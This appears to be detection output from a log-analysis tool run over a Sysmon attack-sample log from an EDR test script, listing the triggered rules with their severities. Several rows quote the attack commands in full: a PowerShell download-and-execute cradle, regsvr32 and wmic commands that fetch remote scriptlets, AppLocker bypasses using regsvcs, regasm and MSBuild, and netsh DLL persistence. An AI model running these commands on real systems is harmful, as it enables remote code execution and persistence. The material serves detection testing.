C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker 
Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 
AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 
+09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 
+09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port 
Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process 